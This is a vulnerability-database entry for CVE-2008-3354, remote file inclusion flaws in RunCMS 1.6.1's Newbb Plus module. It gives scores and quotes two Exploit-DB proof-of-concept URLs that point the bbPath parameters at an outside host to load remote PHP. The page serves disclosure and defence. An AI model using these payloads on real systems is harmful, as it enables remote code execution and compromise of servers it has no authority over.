CVE-2008-3354
published 2008-07-28CVE-2008-3354: Multiple PHP remote file inclusion vulnerabilities in the Newbb Plus (newbb_plus) module 0.93 in RunCMS 1.6.1 allow remote attackers to execute arbitrary PHP…
PriorityP342high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.54%
83.0th percentile
Multiple PHP remote file inclusion vulnerabilities in the Newbb Plus (newbb_plus) module 0.93 in RunCMS 1.6.1 allow remote attackers to execute arbitrary PHP code via a URL in the (1) bbPath[path] parameter to votepolls.php and the (2) bbPath[root_theme] parameter to config.php, different vectors than CVE-2006-0659. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| runcms | newbb_plus_module | — | — |
| runcms | runcms | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
RunCMS 1.6.1 - 'bbPath[root_theme]' Remote File Inclusion
exploitdb·2008-07-21
CVE-2008-3354 RunCMS 1.6.1 - 'bbPath[root_theme]' Remote File Inclusion
RunCMS 1.6.1 - 'bbPath[root_theme]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/30331/info
RunCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.
RunCMS 1.6.1 is vulnerable; other versions may be affected as well.
http://www.example.com/modules/newbb_plus/config.php?bbPath[root_theme]=http://www.example2.com
Exploit-DB
RunCMS 1.6.1 - 'bbPath[path]' Remote File Inclusion
exploitdb·2008-07-21
CVE-2008-3354 RunCMS 1.6.1 - 'bbPath[path]' Remote File Inclusion
RunCMS 1.6.1 - 'bbPath[path]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/30331/info
RunCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.
RunCMS 1.6.1 is vulnerable; other versions may be affected as well.
http://www.example.com/modules/newbb_plus/votepolls.php?bbPath[path]=http://www.example2.com
No writeups or analysis indexed.
2008-07-28
Published